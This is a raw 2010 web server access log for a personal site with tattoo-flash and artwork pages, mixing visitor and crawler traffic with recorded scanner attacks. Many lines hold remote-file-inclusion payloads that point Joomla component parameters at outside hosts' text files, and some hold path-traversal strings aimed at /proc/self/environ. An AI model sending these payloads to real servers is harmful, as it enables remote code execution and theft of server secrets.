87.250.255.243 - - [08/May/2010:02:52:14 -0500] "GET /logs/access_log.1224633600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
209.216.43.133 - - [08/May/2010:03:00:37 -0500] "GET /logs/access_log.1270598400%20%20///components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.virginians.org//extras/preload/id1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
209.216.43.133 - - [08/May/2010:03:00:37 -0500] "GET /logs///components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.virginians.org//extras/preload/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
209.216.43.133 - - [08/May/2010:03:00:37 -0500] "GET ///components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.virginians.org//extras/preload/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
209.216.43.133 - - [08/May/2010:03:01:58 -0500] "GET ///components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.virginians.org//extras/preload/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
209.216.43.133 - - [08/May/2010:03:01:58 -0500] "GET /logs///components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.virginians.org//extras/preload/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
209.216.43.133 - - [08/May/2010:03:01:58 -0500] "GET /logs/access_log.1270598400///components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.virginians.org//extras/preload/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
209.216.43.133 - - [08/May/2010:03:02:40 -0500] "GET /logs/access_log.1272067200%20%20///components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.virginians.org//extras/preload/id1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
87.250.255.243 - - [08/May/2010:03:02:41 -0500] "GET /logs/access_log.1215043200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
209.216.43.133 - - [08/May/2010:03:04:35 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.virginians.org//extras/preload/preload/id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
209.216.43.133 - - [08/May/2010:03:04:35 -0500] "GET /logs/access_log.1266451200//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.virginians.org//extras/preload/preload/id1.txt? HTTP/1.1" 404 358 "-""Mozilla/5.0"
209.216.43.133 - - [08/May/2010:03:04:36 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.virginians.org//extras/preload/preload/id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
209.216.43.133 - - [08/May/2010:03:07:01 -0500] "GET /logs/access_log.1272067200///components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.virginians.org//extras/preload/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
67.195.112.180 - - [08/May/2010:03:10:07 -0500] "GET /logs/access_log.1189123200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.12.204 - - [08/May/2010:03:12:21 -0500] "GET /artwork/furniture-motto-line.htm HTTP/1.1" 200 2441 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.40607; .NET CLR 3.0.30729; .NET CLR 3.5.30729; MS-RTC LM 8)"
87.250.255.243 - - [08/May/2010:03:18:58 -0500] "GET /logs/access_log.1228262400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
92.241.190.214 - - [08/May/2010:03:20:32 -0500] "GET /logs/access_log.1263859200/?sourcedir=http://doitinbergen.com/.logs???? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
92.241.190.214 - - [08/May/2010:03:20:32 -0500] "GET /?sourcedir=http://doitinbergen.com/.logs???? HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
92.241.190.214 - - [08/May/2010:03:20:32 -0500] "GET /logs/?sourcedir=http://doitinbergen.com/.logs???? HTTP/1.1" 200 4749 "-""libwww-perl/5.805"
92.241.190.214 - - [08/May/2010:03:20:41 -0500] "GET /logs/access_log.1262390400/?sourcedir=http://doitinbergen.com/.logs???? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
92.241.190.214 - - [08/May/2010:03:21:30 -0500] "GET /logs/access_log.1264550400/?sourcedir=http://doitinbergen.com/.logs???? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
88.191.94.188 - - [08/May/2010:03:27:18 -0500] "GET /logs//administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
88.191.94.188 - - [08/May/2010:03:27:18 -0500] "GET //administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
88.191.94.188 - - [08/May/2010:03:27:18 -0500] "GET /logs/access_log.1263859200//administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 378 "-""Mozilla/5.0"
88.191.94.188 - - [08/May/2010:03:27:24 -0500] "GET /logs//administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
88.191.94.188 - - [08/May/2010:03:27:24 -0500] "GET //administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
88.191.94.188 - - [08/May/2010:03:27:24 -0500] "GET /logs/access_log.1263859200//administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 378 "-""Mozilla/5.0"
88.191.94.188 - - [08/May/2010:03:27:30 -0500] "GET /logs/access_log.1264982400//administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 378 "-""Mozilla/5.0"
88.191.94.188 - - [08/May/2010:03:27:42 -0500] "GET /logs/access_log.1264982400//administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 378 "-""Mozilla/5.0"
119.63.198.31 - - [08/May/2010:03:37:33 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
87.250.255.243 - - [08/May/2010:03:39:57 -0500] "GET /logs/access_log.1156982400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
124.0.74.195 - - [08/May/2010:03:43:27 -0500] "GET /?sourcedir=http://www.gigacenter.cl//tmp/id1.txt??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
124.0.74.195 - - [08/May/2010:03:43:28 -0500] "GET /logs/access_log.1268956800%20%20/?sourcedir=http://www.gigacenter.cl//tmp/id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
124.0.74.195 - - [08/May/2010:03:43:28 -0500] "GET /logs/?sourcedir=http://www.gigacenter.cl//tmp/id1.txt??? HTTP/1.1" 200 4749 "-""Mozilla/5.0"
212.175.146.45 - - [08/May/2010:03:47:35 -0500] "GET /logs/access_log.1272067200//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.76"
212.175.146.45 - - [08/May/2010:03:47:35 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.76"
212.175.146.45 - - [08/May/2010:03:47:35 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.76"
174.36.1.97 - - [08/May/2010:03:47:39 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
174.36.1.97 - - [08/May/2010:03:47:39 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
220.181.7.97 - - [08/May/2010:03:47:39 -0500] "GET / HTTP/1.1" 200 1003 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
174.36.1.97 - - [08/May/2010:03:48:07 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.86.115.194 - - [08/May/2010:03:53:17 -0500] "GET / HTTP/1.1" 200 1003 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
74.86.115.194 - - [08/May/2010:03:53:17 -0500] "GET /icons/blank.gif HTTP/1.1" 200 148 "http://tomdolan.pconline.com/""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
74.86.115.194 - - [08/May/2010:03:53:17 -0500] "GET /icons/back.gif HTTP/1.1" 200 216 "http://tomdolan.pconline.com/""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
74.86.115.194 - - [08/May/2010:03:53:17 -0500] "GET /icons/folder.gif HTTP/1.1" 200 225 "http://tomdolan.pconline.com/""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
174.36.1.97 - - [08/May/2010:03:56:52 -0500] "GET //index.php?option=com_myblog&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
174.36.1.97 - - [08/May/2010:03:59:47 -0500] "GET /logs/access_log.1272067200//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
174.36.1.97 - - [08/May/2010:03:59:47 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
174.36.1.97 - - [08/May/2010:03:59:47 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
87.250.255.243 - - [08/May/2010:04:00:38 -0500] "GET /logs/access_log.1247270400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
216.129.119.10 - - [08/May/2010:04:01:35 -0500] "GET /logs/access_log.1215388800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
64.79.128.164 - - [08/May/2010:04:02:55 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.com/search?hl=en&client=firefox-a&hs=OXg&rls=org.mozilla%3Aen-US%3Aofficial&q=vintage+tattoo+flash&aq=f&aqi=g3&aql=&oq=&gs_rfai=""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:02:55 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:02:57 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:03:00 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:03:01 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:03:01 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:03:01 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:03:01 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:03:01 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:03:01 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:03:01 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:03:01 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:03:01 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:03:02 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:03:02 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:03:12 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:03:12 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:03:12 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:03:12 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:03:12 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:03:12 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:03:12 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:03:12 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:03:12 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:03:12 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:03:12 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:03:22 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:03:22 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:03:22 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:03:22 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:03:22 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:03:22 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:03:22 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:03:22 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:03:22 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:03:22 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:03:22 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:03:35 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:03:35 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:03:35 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:03:35 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:03:35 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:03:35 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:03:35 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:03:35 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:03:35 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:03:35 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:03:35 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:03:42 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:03:42 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:03:42 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:03:42 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
64.79.128.164 - - [08/May/2010:04:03:46 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
174.129.245.165 - - [08/May/2010:04:05:38 -0500] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.avion-rc.com/components/com_user/models/readme.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
174.129.245.165 - - [08/May/2010:04:05:38 -0500] "GET /logs/access_log.1263168000//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.avion-rc.com/components/com_user/models/readme.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
